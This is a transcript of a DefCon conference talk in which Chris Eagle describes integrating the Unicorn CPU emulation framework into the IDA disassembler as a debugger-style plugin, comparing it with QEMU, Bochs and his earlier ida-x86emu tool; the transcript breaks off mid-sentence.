00:00:00.767,00:00:05.506 >> Hi DefCon. So, you’re at the last talk of the evening. Please 00:00:05.506,00:00:10.344 welcome Chris Eagle. [Audience Applause] >>All right, thanks 00:00:10.344,00:00:16.483 very much. Can everybody hear me? [Inaudible audience reply] 00:00:16.483,00:00:21.488 Can’t hear you. Can you hear me? Good. [Inaudible] Um, I’m Chris 00:00:23.590,00:00:26.260 Eagle, thanks uh, thanks for coming. Got the Mr Robot 00:00:26.260,00:00:29.463 [Inaudible] on next door. Maybe you’re all just here to stare at 00:00:29.463,00:00:33.834 the sexy machines back here, I don’t know. I’m about tired of 00:00:33.834,00:00:39.039 them [Laughs] [Audience laughs] Oh, where did my sheep go? 00:00:39.039,00:00:45.078 [Grunts] She wandered off. Um, okay, um [Chuckles] Wrong 00:00:45.078,00:00:50.083 angle... [Chuckles] Not her best side.... Okay, I’m here to talk 00:00:52.252,00:00:55.989 about uh, a project that I’ve been working on uh, for lack 00:00:55.989,00:01:00.794 of a better name, called ‘sk3wldbg’. And, uh, it’s about uh, 00:01:00.794,00:01:05.799 emulating various processors using uh, the Unicorn framework 00:01:05.799,00:01:09.102 for emulation that was released at BlackHat last year, and uh, 00:01:09.102,00:01:13.607 because it’s kind of what I do, it’s all baked into IDA, and 00:01:13.607,00:01:16.910 we’ll uh, we’ll see if it’s interesting and go through a 00:01:16.910,00:01:20.914 couple of examples and watch things crash, uh, and hopefully 00:01:20.914,00:01:24.451 have some fun. Uh, got to say this – everything I say today is 00:01:24.451,00:01:26.954 my uh my own opinion, not uh not that of my employer and 00:01:26.954,00:01:32.225 certainly not that of DARPA. Uh, they don’t let me talk on their 00:01:32.225,00:01:35.429 behalf. Uh, little bit about me if you don’t know. These folks 00:01:35.429,00:01:37.564 down here in the front row are filling seats to make the room 00:01:37.564,00:01:41.335 look full. 
I’m a senior lecturer of computer science at uh, out 00:01:41.335,00:01:43.303 at a place called the Naval Postgraduate School in Monterey, 00:01:43.303,00:01:48.308 California. Doing security related stuff, uh, for a long 00:01:48.308,00:01:52.045 time now. Do a lot of reverse engineering of various sorts. I 00:01:52.045,00:01:54.348 play a lot of capture the flag; I’ll be racing back over there 00:01:54.348,00:01:59.987 right after this talk is over. And, uh, a performer of really 00:01:59.987,00:02:04.491 stupid IDA tricks, proving that just because it can be done, doesn’t 00:02:04.491,00:02:07.627 mean it should be done, but that’s worth your watch I guess. 00:02:07.627,00:02:12.633 Uh, so this is really about CPU emulators, okay and uh, they’re 00:02:15.435,00:02:22.109 useful in a lot of cases where you may not have the hardware to 00:02:22.109,00:02:24.711 run a uh, particular set of code on; whether it’s a 00:02:24.711,00:02:28.015 well-structured binary, or just a small snippet of something 00:02:28.015,00:02:31.084 like say shellcode, and you don’t happen to have an ARM 00:02:31.084,00:02:34.221 device or a MIPS device or a SPARC device sitting around and 00:02:34.221,00:02:36.490 you want to know how this thing behaves. So, you’re either going 00:02:36.490,00:02:41.161 to become the world’s best human MIPS engine and you can 00:02:41.161,00:02:44.131 interpret this stuff in your head and process it and uh, 00:02:44.131,00:02:48.568 figure out what’s going on or you might want some help. 
And 00:02:48.568,00:02:51.671 that’s uh, what I was looking for when I started thinking 00:02:51.671,00:02:56.943 about baking emulators into things like IDA, because in my 00:02:56.943,00:03:00.547 particular use case, IDA is virtually my desktop - I’m in it 00:03:00.547,00:03:06.019 all the time, and I often have a desire to step out and execute 00:03:06.019,00:03:08.221 something because perhaps my comprehension of the 00:03:08.221,00:03:10.991 instruction set is not sufficient for me to 00:03:10.991,00:03:13.960 understand what I’m reading, or I just want to verify my 00:03:13.960,00:03:17.998 suspicions about the behavior of a section of code, I’d like to run 00:03:17.998,00:03:21.068 through it – perhaps not an entire executable, maybe I don’t 00:03:21.068,00:03:25.639 want uh, to have to load up an ELF and deal with you know the 00:03:25.639,00:03:29.443 kernel, loader, and operating system, etcetera. And uh, 00:03:29.443,00:03:33.313 libraries, it’s just a full-blown execution environment 00:03:33.313,00:03:37.884 just to run through five to ten lines of code. Okay, so – I 00:03:37.884,00:03:39.853 thought about this and decided that if you know I could just 00:03:39.853,00:03:43.423 run these lines of code every time I wanted, in some very 00:03:43.423,00:03:46.393 stripped-down environment, wouldn’t that be nice? We’ll 00:03:46.393,00:03:49.529 talk about how I got to that – how I got there from, uh, from 00:03:49.529,00:03:52.065 here. You might also want to run some code on obsolete 00:03:52.065,00:03:55.735 platforms, because you don’t have real hardware to do it on. 00:03:55.735,00:03:58.004 There’s plenty of software emulators out there these days 00:03:58.004,00:04:02.542 that do these kinds of things. But, uh, another use case for 00:04:02.542,00:04:08.381 uh, emulation and uh, there’s another one I missed but I’m not 00:04:08.381,00:04:10.951 going to go back. 
Uh, so emulators run the gamut from the 00:04:10.951,00:04:14.287 the, simplest emulators that there are – Unicorn is in fact a 00:04:14.287,00:04:18.525 very simple emulator. In fact, it’s not itself an emulator, it’s 00:04:18.525,00:04:22.929 not a stand-alone thing, it is an API that lets you point at 00:04:22.929,00:04:25.832 instructions and execute instructions one or more at a 00:04:25.832,00:04:30.203 time. Okay, receiving some signals along the way – you can, 00:04:30.203,00:04:33.006 you can hook into it and get call-backs, and so on. And I’m 00:04:33.006,00:04:35.308 really not going to talk about the inner workings of Unicorn, 00:04:35.308,00:04:39.112 but I would encourage you to go out and try to find some of the 00:04:39.112,00:04:42.449 slide decks that they posted following BlackHat last year and 00:04:42.449,00:04:44.785 there’s some other presentations they’ve given at a variety of 00:04:44.785,00:04:49.489 conferences, uh, and uh dig into the projects if uh you think 00:04:49.489,00:04:53.927 you, you have a use for baking an emulator into anything. It is 00:04:53.927,00:04:57.097 sort of to execution of instructions what 00:04:57.097,00:05:02.636 Capstone was to disassembly of instruction sets. So a fairly 00:05:02.636,00:05:06.540 general-purpose framework across many architectures that lets you 00:05:06.540,00:05:10.110 uh script up things very quickly, uh and in this case uh 00:05:10.110,00:05:14.014 we’re going to execute things uh, in just a few lines of code. 00:05:14.014,00:05:17.984 Uh, that’s the basics of Unicorn and all [Inaudible] get 00:05:17.984,00:05:20.387 into. But, there are a few fairly sophisticated emulators out 00:05:20.387,00:05:23.356 there; I will refer to those later on, but Unicorn is 00:05:23.356,00:05:28.495 literally: point at an instruction and update the 00:05:28.495,00:05:31.831 internal state of Unicorn and that is it. 
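The "point at an instruction, update the state, get a callback" model described above can be sketched in a few lines. This is a toy illustration only: the two-byte instruction set, the `ToyCpu` class and its method names are all invented for this sketch and are not Unicorn's API. It only shows the shape of a CPU-only emulator that has registers, memory and hooks, with no devices or operating system behind it.

```python
from dataclasses import dataclass, field
from typing import Callable, Dict, List

# Toy two-byte instruction set, invented for this sketch (not a real CPU):
#   0x01 rr -> increment register rr
#   0x02 rr -> decrement register rr
OP_INC, OP_DEC = 0x01, 0x02


@dataclass
class ToyCpu:
    memory: bytearray = field(default_factory=lambda: bytearray(256))
    regs: Dict[int, int] = field(default_factory=lambda: {0: 0, 1: 0})
    code_hooks: List[Callable[["ToyCpu", int], None]] = field(default_factory=list)

    def mem_write(self, address: int, data: bytes) -> None:
        """Copy raw bytes (code or data) into emulated memory."""
        self.memory[address:address + len(data)] = data

    def step(self, pc: int) -> int:
        """Execute the single instruction at pc and return the next pc."""
        for hook in self.code_hooks:
            hook(self, pc)  # callback fires before the instruction runs
        opcode, reg = self.memory[pc], self.memory[pc + 1]
        if opcode == OP_INC:
            self.regs[reg] = (self.regs[reg] + 1) & 0xFFFFFFFF
        elif opcode == OP_DEC:
            self.regs[reg] = (self.regs[reg] - 1) & 0xFFFFFFFF
        else:
            raise ValueError(f"unknown opcode {opcode:#x} at {pc:#x}")
        return pc + 2

    def run(self, begin: int, until: int) -> None:
        """Execute instructions from begin until pc reaches until."""
        pc = begin
        while pc != until:
            pc = self.step(pc)


cpu = ToyCpu()
cpu.mem_write(0x10, bytes([OP_INC, 0, OP_DEC, 1]))  # two instructions
cpu.regs[0], cpu.regs[1] = 0x1234, 0x7890           # initial register state
trace: List[int] = []
cpu.code_hooks.append(lambda c, pc: trace.append(pc))  # record each pc
cpu.run(0x10, 0x14)
```

After the run, the only things that have changed are the two registers and the recorded trace, which is the whole point: state in, state out, nothing else.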
And if that instruction 00:05:31.831,00:05:35.035 manipulates hardware, you’re not going to get anything like that, 00:05:35.035,00:05:39.806 okay so the notion of a full-blown emulator like QEMU 00:05:39.806,00:05:44.778 isn’t what you’re going to get out of Unicorn. So, the idea 00:05:44.778,00:05:48.915 with this project was to build a lightweight CPU emulator, 00:05:48.915,00:05:53.086 available in a static reverse engineering context, right. I 00:05:53.086,00:05:57.324 didn’t want to have to go full-on dynamic analysis, uh, 00:05:57.324,00:06:00.794 with debuggers and processes and maybe hardware, an operating 00:06:00.794,00:06:03.096 system, any of that stuff – I just wanted a very lightweight 00:06:03.096,00:06:06.700 emulator that would let me step through code. We can expand on 00:06:06.700,00:06:09.769 it from there, and I’ll go into uh, a little bit about the 00:06:09.769,00:06:14.241 history and what led me here, in uh, in a couple slides. The 00:06:14.241,00:06:17.677 idea is – you’re looking at some code – we step out of that 00:06:17.677,00:06:21.715 static context, we go execute through some instructions in 00:06:21.715,00:06:24.951 this emulated manner, and then we take the knowledge that we 00:06:24.951,00:06:29.022 gained by observing the execution state, either to 00:06:29.022,00:06:32.025 enhance our understanding of the binary, or maybe incorporate 00:06:32.025,00:06:36.563 some of that information back into our static picture, to 00:06:36.563,00:06:40.300 perhaps improve a disassembly and make some annotations uh, 00:06:40.300,00:06:44.004 what have you. 
You know, you could do something as simple as utilising 00:06:44.004,00:06:49.209 a simple loop that you see in some code, to decrypt, decode, 00:06:49.209,00:06:52.579 de-obfuscate, whatever it might be, whether that itself is code, 00:06:52.579,00:06:56.516 self-modifying code or whether it’s some data uh, some strings, 00:06:56.516,00:06:58.852 anything like that and then bring that data, that 00:06:58.852,00:07:03.957 information back into our static analysis, uh, without having to actually execute any 00:07:03.957,00:07:10.497 code. Uh, okay – so the end result is what I’m going 00:07:10.497,00:07:13.033 to talk about today, just like the [ia] emulator that I baked 00:07:13.033,00:07:16.703 into IDA, because if it’s not in IDA I’m probably not going to 00:07:16.703,00:07:21.174 use it and that provides my static uh, analysis side - my 00:07:21.174,00:07:24.711 disassembly side and then the emulator, as I’ve mentioned 00:07:24.711,00:07:28.214 previously, is going to be based on this Unicorn framework. I’m 00:07:28.214,00:07:33.019 blowing through these slides; I’ll be done in no time. 00:07:33.019,00:07:34.821 [Mumbling] Uh, I imagine if you’re sitting in this room 00:07:34.821,00:07:39.492 today, you’re probably familiar with IDA? So, uh, if you’re not, 00:07:39.492,00:07:41.828 okay… It’s a commercial disassembler, there’s some other 00:07:41.828,00:07:44.030 disassemblers out there, we’re seeing new ones every day. 00:07:44.030,00:07:47.067 Binary Ninja’s a new one that was just released, and uh, maybe 00:07:47.067,00:07:49.469 we can take this project and integrate it with that someday. 00:07:49.469,00:07:54.474 Uh, but for now, uh, I’m primarily working in IDA. 
It 00:07:54.474,00:07:57.110 supports a lot of different processor families, uh, and so 00:07:57.110,00:08:00.714 that - to me - made it attractive uh, to marry up with 00:08:00.714,00:08:03.116 Unicorn – which also supports a lot of different processor 00:08:03.116,00:08:06.619 families, not as many processor families as IDA does, but okay, 00:08:06.619,00:08:08.655 more than one, more than two, more than three, I don’t know 00:08:08.655,00:08:12.158 six or so. I’ll list them out here in a minute. Uh, but, it 00:08:12.158,00:08:14.861 meant that IDA could understand all of the code that I would 00:08:14.861,00:08:18.732 ever want to emulate in Unicorn. Okay, because the processors 00:08:18.732,00:08:23.303 that IDA supports are a superset of the processor architectures 00:08:23.303,00:08:30.110 that are supported by Unicorn, okay. It’s got uh, IDA itself 00:08:30.110,00:08:34.180 has integrated debugging support, so actual dynamic 00:08:34.180,00:08:36.516 analysis - let’s fire up the process, attach to it and 00:08:36.516,00:08:41.654 pull state. Uh, for x86 and ARM targets and it can do some 00:08:41.654,00:08:45.692 remote debugging on some other targets. Uh, it also has uh, 00:08:45.692,00:08:50.697 decompilers for 32- and 64-bit x86, also 32- and 64-bit ARM. And 00:08:53.066,00:08:58.438 that’s not entirely relevant to our talk today. Unicorn, as I 00:08:58.438,00:09:03.343 mentioned, was introduced at BlackHat last year, comes again 00:09:03.343,00:09:06.179 out of the same group that did Capstone, the disassembly 00:09:06.179,00:09:08.948 framework, and now they have uh, a tool called Keystone that in 00:09:08.948,00:09:11.651 fact they may have talked about at BlackHat. Anybody at 00:09:11.651,00:09:14.587 BlackHat? Did they do Keystone this year? Yeah. So they talked 00:09:14.587,00:09:16.623 about their new project – Keystone – I hope these guys 00:09:16.623,00:09:19.125 keep coming back. 
That’s like three years in a row – Capstone, 00:09:19.125,00:09:22.862 Unicorn, Keystone and they’re all pretty useful projects. And 00:09:22.862,00:09:25.465 Keystone is their assembly framework. So now we have a 00:09:25.465,00:09:28.067 disassembly framework, an assembly framework and an 00:09:28.067,00:09:30.870 emulation framework. And you start to roll these things 00:09:30.870,00:09:33.740 together and you get uh, pretty powerful reverse engineering 00:09:33.740,00:09:38.044 capabilities. The link out there to their site is up there on the 00:09:38.044,00:09:43.383 slide. Uh, it, as an emulation framework, is actually based on 00:09:43.383,00:09:48.188 QEMU, so if you’ve ever used QEMU you know that it also 00:09:48.188,00:09:50.990 supports a large number of architectures. And you might 00:09:50.990,00:09:55.161 say, well why do we have Unicorn if QEMU supports a large number 00:09:55.161,00:09:59.666 of architectures, and in fact Unicorn is based on QEMU? Right, 00:09:59.666,00:10:04.103 isn’t this just the same thing all over again? The answer is 00:10:04.103,00:10:10.009 “not quite”. QEMU has a lot of support uh, all the way down 00:10:10.009,00:10:13.713 into hardware shims that let you do full-blown system 00:10:13.713,00:10:17.684 emulation, we can, we can boot Linux, we can boot Windows in 00:10:17.684,00:10:22.055 the QEMU environment because it has that support for hardware 00:10:22.055,00:10:25.892 interfaces, virtual devices and so on. The Unicorn folks were 00:10:25.892,00:10:29.529 not interested in any of that. All they wanted to do was be 00:10:29.529,00:10:34.467 able to emulate processor instructions. Okay, they don’t 00:10:34.467,00:10:36.603 want the hardware interface; they’re not trying to provide 00:10:36.603,00:10:40.106 you network and video drivers or any of that stuff. They just 00:10:40.106,00:10:45.044 wanted to help you uh, emulate instructions. What does it do? 
00:10:45.044,00:10:50.316 Let’s see, right we run it in the emulator. What they did, was 00:10:50.316,00:10:54.621 they tore into QEMU, they ripped out all that hardware abstraction 00:10:54.621,00:10:59.826 layer and were left only with, effectively the processors, 00:10:59.826,00:11:05.431 right, the software CPUs that they then layered on top of 00:11:05.431,00:11:08.234 right, we instantiate a processor give it some state it 00:11:08.234,00:11:13.139 can manipulate and they give you access to that processor’s state 00:11:13.139,00:11:18.144 and nothing more. They expose some of that, up to a couple of 00:11:21.014,00:11:26.920 different types of APIs, and there you have it right. A 00:11:26.920,00:11:29.956 scriptable emulator. Supports the processor 00:11:29.956,00:11:34.527 families you see here: x86 both 32- and 64-bit, same for ARM, 00:11:34.527,00:11:38.831 SPARC, MIPS and Motorola 68000. That’s not all of the processor 00:11:38.831,00:11:44.437 families that are supported by QEMU, but it’s a start. It does 00:11:44.437,00:11:48.708 take a fair amount of work to provide the interface to a given 00:11:48.708,00:11:52.178 processor architecture, uh but I don’t think it would be a 00:11:52.178,00:11:55.381 stretch to add in some of the other processor families that 00:11:55.381,00:11:58.818 are supported by QEMU, if you wanted to enhance the 00:11:58.818,00:12:02.689 capabilities of Unicorn. Okay, a number of projects, this is just 00:12:02.689,00:12:06.926 one of them, have come along which make use of Unicorn – some 00:12:06.926,00:12:12.165 of them are uh, pretty amazing, and uh, baked into a lot of very 00:12:12.165,00:12:15.301 interesting analysis frameworks. I posted a link at the bottom, 00:12:15.301,00:12:18.705 because you may be more interested in those uh, than 00:12:18.705,00:12:22.075 Unicorn itself because they provide a somewhat more finished 00:12:22.075,00:12:24.644 product. 
Right, these are things that you’d make use of 00:12:24.644,00:12:28.281 right out of the box, right – if you did not intend to bake you 00:12:28.281,00:12:31.818 know – if you didn’t have a need to script an emulator of your 00:12:31.818,00:12:38.691 own. So, you can go find those out there, play around and so on, 00:12:38.691,00:12:42.128 okay. So, I picked IDA and I picked Unicorn – there are some 00:12:42.128,00:12:44.664 other emulators as I’ve mentioned, I talked about QEMU 00:12:44.664,00:12:47.400 already. I talked about, I haven’t talked about Bochs – Bochs 00:12:47.400,00:12:52.071 is another one, okay. It is a pure x86 emulator. These are 00:12:52.071,00:12:55.975 blurbs off of each of their project pages. Bochs is a highly 00:12:55.975,00:13:00.813 portable open source 32-bit uh, x86 emulator. While QEMU is more 00:13:00.813,00:13:04.584 general, a generic, more processors, open source machine 00:13:04.584,00:13:08.254 emulator and virtualizer. It’s a little bit more sophisticated 00:13:08.254,00:13:14.560 than Bochs, but it’s also, there’s a lot more to it than Bochs. So, 00:13:14.560,00:13:20.066 could have gone with either of these I suppose, but they really 00:13:20.066,00:13:25.104 weren’t geared to script around, okay, and just, just access just 00:13:25.104,00:13:29.208 the processor bits. So this is sort of where I’ve been with 00:13:29.208,00:13:33.446 this project, okay. It’s uh, it’s been kind of a long road. 00:13:33.446,00:13:36.783 Unicorn came along and filled a need that I had and actually 00:13:36.783,00:13:40.620 fulfilled a, a vision that I had back in 2003, when I built a 00:13:40.620,00:13:44.323 tool called ida-x86emu. Okay, where I wanted to do exactly 00:13:44.323,00:13:47.360 what I’d described. I wanted to sit in IDA and I just wanted to 00:13:47.360,00:13:51.831 emulate things. Okay. 
And use that to either transform my, my 00:13:51.831,00:13:54.634 static analysis picture or enhance my understanding of the 00:13:54.634,00:13:58.604 behaviour of something. Okay. So, I did that and at the time 00:13:58.604,00:14:01.374 that I did that I looked at those emulators, primarily Bochs 00:14:01.374,00:14:05.545 and QEMU back then, and thought “Can I rip into this, strip out 00:14:05.545,00:14:08.848 the bits I don’t need and take just the emulator?” and I looked 00:14:08.848,00:14:12.452 at it and I’m lazy and I said “Hell no” because they’re way 00:14:12.452,00:14:16.556 too big. Right, so 13 years later, 12 years later somebody 00:14:16.556,00:14:21.094 did it for me. Okay, and so then I revisited this project and 00:14:21.094,00:14:24.297 retooled, and that’s again why I’m here talking today. Somebody 00:14:24.297,00:14:27.900 did all the heavy lifting, by stripping out all the, all the 00:14:27.900,00:14:32.805 unnecessary stuff out of QEMU and dropping it in my lap. Along 00:14:32.805,00:14:38.311 the way, the Hex-Rays folks did an integration between Hex-Rays 00:14:38.311,00:14:40.346 and Bochs. They did it in a slightly different way, and I’ll 00:14:40.346,00:14:43.116 do two quick demos later on, on what these things look like and 00:14:43.116,00:14:46.185 the different approaches you might take, as you think about 00:14:46.185,00:14:51.324 doing emulation in combination with a static analysis. So they 00:14:51.324,00:14:55.862 released a Bochs debugger module, that IDA could communicate with. 00:14:55.862,00:14:58.898 Right. If you’re familiar with IDA, you’ll understand what the 00:14:58.898,00:15:03.236 debugging uh, views look like, uh, in contrast to the, the pure 00:15:03.236,00:15:06.539 static analysis view, and we’ll uh see that here in a few 00:15:06.539,00:15:13.379 minutes. 
Uh, I did a similar thing for uh, the MSP430 processor, uh 00:15:13.379,00:15:17.784 which uh, was the uh, processor that got used for the Microcorruption 00:15:17.784,00:15:20.019 challenges. If any folks have seen that, they’re a 00:15:20.019,00:15:24.490 lot of fun. Uh, and they were, that was a pure MSP430 00:15:24.490,00:15:27.493 implementation and I didn’t want to deal with their clunky user 00:15:27.493,00:15:32.198 interface through uh, through a browser, uh so I did this emulator, 00:15:32.198,00:15:36.736 uh, it was in a style very similar to ida-x86emu. And then 00:15:36.736,00:15:41.808 along came Unicorn, and it took me a while, but I finally 00:15:41.808,00:15:48.347 decided to integrate it into IDA to see if I liked it better or 00:15:48.347,00:15:52.218 provided- proved more useful, uh, than some of these other 00:15:52.218,00:15:57.523 combinations of tools. [Clears Throat] As I mentioned, I looked 00:15:57.523,00:16:00.393 at QEMU and Bochs briefly, but that was going to be a lot of 00:16:00.393,00:16:03.729 work. Uh, I didn’t have the time to uh, do it all and then again 00:16:03.729,00:16:07.166 somebody else came along and did it, uh and their approach 00:16:07.166,00:16:10.837 because we finally got QEMU involved in this whole thing, uh 00:16:10.837,00:16:13.306 it gives us a lot more processors uh, than uh, uh, my 00:16:13.306,00:16:17.343 particular approach, which was specifically an x86 emulator and 00:16:17.343,00:16:20.279 so I got that one narrow architecture and I’ve never had 00:16:20.279,00:16:23.783 another architecture and I’ve never wanted to do another 00:16:23.783,00:16:26.786 architecture, because doing an architecture from scratch uh, 00:16:26.786,00:16:31.290 was just more work than I wanted to get involved with. So, this 00:16:31.290,00:16:37.997 was a nice marriage for me. [Clears Throat] Now, to the 00:16:37.997,00:16:41.901 implementation. In implementing this, I had to make a couple of 00:16:41.901,00:16:45.204 choices. 
Okay, again uh hopefully people are somewhat 00:16:45.204,00:16:50.009 familiar with IDA and what it looks like, okay. With IDA you 00:16:50.009,00:16:53.446 get your standard disassembly view okay, and then there’s this 00:16:53.446,00:16:57.750 debugging view. Okay, but you have to do a little bit of work 00:16:57.750,00:17:00.753 to integrate what you’ve learned from the debugger back into the 00:17:00.753,00:17:04.757 disassembly view and oftentimes it involves overwriting a lot of 00:17:04.757,00:17:08.394 information in your disassembly view. Okay, so you might go 00:17:08.394,00:17:11.530 into the debugger and learn something but it’s it’s fairly 00:17:11.530,00:17:13.966 transient in nature because you’re starting a process and 00:17:13.966,00:17:17.470 eventually that process is going to terminate, and the 00:17:17.470,00:17:20.206 information that you learn, uh vanishes with that process. 00:17:20.206,00:17:23.676 Okay, there are ways to migrate some of that information back 00:17:23.676,00:17:27.413 into IDA; overwriting the initia- the original data in IDA 00:17:27.413,00:17:32.485 uh, but you’d have to automate some of that and uh, it’s it’s 00:17:32.485,00:17:36.322 not necessarily a very clean approach. Okay, so the 00:17:36.322,00:17:39.792 alternative approach is you don’t jump out to a debugger, 00:17:39.792,00:17:43.429 and you find some way to incorporate emulation right 00:17:43.429,00:17:47.900 there alongside your static analysis view. Okay, in order to 00:17:47.900,00:17:50.536 do that your emulation has to be able to maintain state, so 00:17:50.536,00:17:54.507 you’re either maintaining state entirely separately from what 00:17:54.507,00:17:57.410 you’re looking at in IDA, right? In IDA you get to see an entire 00:17:57.410,00:18:00.479 disassembly right, through the various portions of a program; 00:18:00.479,00:18:03.883 your code, your data, etcetera. 
What you don’t have are things 00:18:03.883,00:18:07.787 like a stack or a heap, right, any of your uh, virtually 00:18:07.787,00:18:13.326 allocated memory. Uh, and, but you need that in the emulation. 00:18:13.326,00:18:16.462 So, you either start modifying your database and adding all of 00:18:16.462,00:18:20.733 that, those bits and pieces in there, right so you expose them 00:18:20.733,00:18:24.470 and make them available to view and navigate through. Or, all 00:18:24.470,00:18:27.340 that information remains buried in the emulation and you have to 00:18:27.340,00:18:31.344 come up with some way to, to propagate just what you want up 00:18:31.344,00:18:34.680 into the static analysis view, when you’re ready to consume it 00:18:34.680,00:18:36.616 right, when you’ve decided that you’ve learned what you wanted 00:18:36.616,00:18:39.652 to learn and you’re ready to annotate that static analysis. 00:18:41.887,00:18:45.858 When I did x86emu, I took the first approach. Okay, and you’re 00:18:45.858,00:18:49.795 literally emulating on top of an existing IDA database, so as you 00:18:49.795,00:18:53.232 do the emulation, your database gets modified. There are 00:18:53.232,00:18:55.601 some advantages and disadvantages to that approach, 00:18:55.601,00:18:58.337 right. The disadvantage is obviously that it is destructive, 00:18:58.337,00:19:01.841 okay, so once you’ve modified something in you know, if you’re 00:19:01.841,00:19:04.844 an IDA user you know there’s no ‘undo’ in IDA. Right, so once 00:19:04.844,00:19:07.480 you’ve modified it, right, there’s no going back, right. 00:19:07.480,00:19:09.949 So, if you want to see what it used to look like, you either 00:19:09.949,00:19:14.420 maintain a separate database, a lot of snapshots uh, and it 00:19:14.420,00:19:17.957 becomes – it becomes a headache. But there – I have found it to 00:19:17.957,00:19:24.230 be useful in many cases. 
The alternative approach is to take 00:19:24.230,00:19:28.167 a debugging sort of approach, and generally speaking in IDA that 00:19:28.167,00:19:31.203 means you’re launching a process and you’re attaching to it in the 00:19:31.203,00:19:33.939 way that a standard debugger would attach to the process; 00:19:33.939,00:19:38.711 controlling the process, viewing the state of the process using 00:19:38.711,00:19:43.082 IDA as a viewer, okay so you see what the running process state 00:19:43.082,00:19:45.718 is, gives you access to all the things you have in a typical 00:19:45.718,00:19:49.922 debugger. And in this case you’re not manipulating your 00:19:49.922,00:19:53.159 static view at all, that IDA database doesn’t get changed at 00:19:53.159,00:19:57.196 all, unless you absolutely want it to. Okay, your view is 00:19:57.196,00:20:01.233 strictly into that transient process. Okay, again when it’s 00:20:01.233,00:20:04.670 done, it’s done, okay. Perhaps you learn something, perhaps you 00:20:04.670,00:20:08.040 use it to update your state - the way you use that is entirely 00:20:08.040,00:20:11.877 up to you. This is the approach that the Hex-Rays folks took when 00:20:11.877,00:20:17.483 they integrated Bochs into IDA. IDA shells out to Bochs, they 00:20:17.483,00:20:22.788 create some IPC links between IDA and Bochs, IDA pushes the 00:20:22.788,00:20:27.426 state into Bochs, okay, including right the code, the data that 00:20:27.426,00:20:32.498 are being represented in that IDA database, and then tells Bochs 00:20:32.498,00:20:36.068 to go, right, gives it an initial register state and 00:20:36.068,00:20:40.439 then single steps, or allows it to run freely, okay, as you see 00:20:40.439,00:20:44.477 fit. Okay, pulls the data back out of Bochs and shows it to you 00:20:44.477,00:20:47.079 in IDA’s debugger view. But then again, once you’re done, you’re 00:20:47.079,00:20:50.850 done and none of that updates your static analysis state. 
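The difference between the two approaches just described, emulating on top of the database versus emulating in a separate debugger-style process, comes down to where the emulator's writes land. The sketch below is a simplified model under stated assumptions: a `bytearray` stands in for the IDA database, an XOR loop stands in for the emulated decode routine, and the class and function names (`InPlaceMemory`, `DetachedMemory`, `pull_back`, `xor_decode`) are hypothetical and belong to no real plugin.

```python
class InPlaceMemory:
    """Emulate directly on top of the database bytes (destructive)."""

    def __init__(self, database: bytearray) -> None:
        self.data = database  # same object: every write changes the database

    def read(self, addr: int) -> int:
        return self.data[addr]

    def write(self, addr: int, value: int) -> None:
        self.data[addr] = value & 0xFF


class DetachedMemory(InPlaceMemory):
    """Debugger-style: work on a private copy; the database is untouched."""

    def __init__(self, database: bytearray) -> None:
        super().__init__(bytearray(database))  # private copy of the bytes
        self.database = database

    def pull_back(self, start: int, length: int) -> None:
        """Explicitly copy a chosen range of results into the database."""
        self.database[start:start + length] = self.data[start:start + length]


def xor_decode(mem: InPlaceMemory, start: int, length: int, key: int) -> None:
    """Stand-in for an emulated decode loop: XOR each byte with key."""
    for addr in range(start, start + length):
        mem.write(addr, mem.read(addr) ^ key)


encoded = bytes(b ^ 0x5A for b in b"secret")

# First approach: the decode overwrites the database, with no way back.
db_a = bytearray(encoded)
xor_decode(InPlaceMemory(db_a), 0, len(db_a), 0x5A)

# Second approach: the decode happens in the copy; the database changes
# only when we decide to pull a range back.
db_b = bytearray(encoded)
detached = DetachedMemory(db_b)
xor_decode(detached, 0, len(db_b), 0x5A)
untouched = bytes(db_b)            # still the encoded bytes at this point
detached.pull_back(0, len(db_b))   # opt-in update of the static picture
```

The second model costs an extra copy and an explicit pull-back step, but it keeps the static picture intact until you choose to annotate it.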
I did 00:20:50.850,00:20:54.753 mention there are some ways to pull state back into IDA, but 00:20:54.753,00:20:59.158 you know it’s entirely up to you how you’re going to do it. I’ll 00:20:59.158,00:21:01.193 show you some demonstrations, I’ll show you two approaches, 00:21:01.193,00:21:05.831 and uh, you can use that to understand what I do with 00:21:05.831,00:21:12.304 Unicorn. [Clears Throat] In the case of Unicorn, the approach I 00:21:12.304,00:21:17.409 ended up taking was the debugging approach. Because, it 00:21:17.409,00:21:19.612 just felt a little bit cleaner, I didn’t want to get into 00:21:19.612,00:21:23.883 updating databases uh, I wanted to leave things flexible for the 00:21:23.883,00:21:28.220 future, uh, I might come along and implement it differently. But, 00:21:28.220,00:21:31.457 in order to implement it outside of a debugger, right, IDA 00:21:31.457,00:21:37.129 doesn’t provide you any tools uh, to display something like 00:21:37.129,00:21:41.000 registers, for example. Any of that execution state; while 00:21:41.000,00:21:43.802 you’re in a static analysis state registers have no value, so 00:21:43.802,00:21:48.073 you have to invent that user interface yourself. So, that’s 00:21:48.073,00:21:52.077 one of the hard parts about doing it, uh, outside of the 00:21:52.077,00:21:55.414 debugger state. My wife’s probably – she’s sitting up here 00:21:55.414,00:21:59.518 and she’s not liking the slide – I don’t know, or agreeing with 00:21:59.518,00:22:03.589 it. Right, in any case, uh took on this task trying to integrate 00:22:03.589,00:22:07.693 IDA with uh, Unicorn, uh, a lot of unhappy development time, uh, 00:22:07.693,00:22:13.632 a supportive wife, okay, a lot of time dealing with a mostly 00:22:13.632,00:22:18.771 undocumented IDA interface, uh, dealing with a particular style 00:22:18.771,00:22:22.208 of plugin, known as a debugger plugin. 
And again, for those of 00:22:22.208,00:22:25.811 you that know IDA, you know the state of its documentation. Uh, 00:22:25.811,00:22:28.480 so I spent a lot of time reverse engineering IDA to try to learn 00:22:28.480,00:22:31.717 how their debuggers actually work, because there isn’t much 00:22:31.717,00:22:35.521 to go on in there. Uh, at the same time I was trying to 00:22:35.521,00:22:39.091 integrate a piece of software that was really, I’d say beta, 00:22:39.091,00:22:42.127 that’s kind of generous, at the time I was doing this it was 00:22:42.127,00:22:47.733 more like pre-alpha. So, uh, you never know where the problems 00:22:47.733,00:22:52.104 lie – is it Unicorn? Is it IDA? Is it me? Uh, and uh, that’s 00:22:52.104,00:22:58.644 what led to bullet number one. But in the end I was able to 00:22:58.644,00:23:04.717 subclass IDA’s debugger type, to provide debuggers for all of the 00:23:04.717,00:23:10.923 supported Unicorn processor families, and end up with a 00:23:10.923,00:23:16.128 debugger style interface for any one of these architectures, that 00:23:16.128,00:23:19.565 you could use to emulate code wherever you are. So, if you’re 00:23:19.565,00:23:22.801 using IDA on Windows, and you’re running Unicorn, and you open up 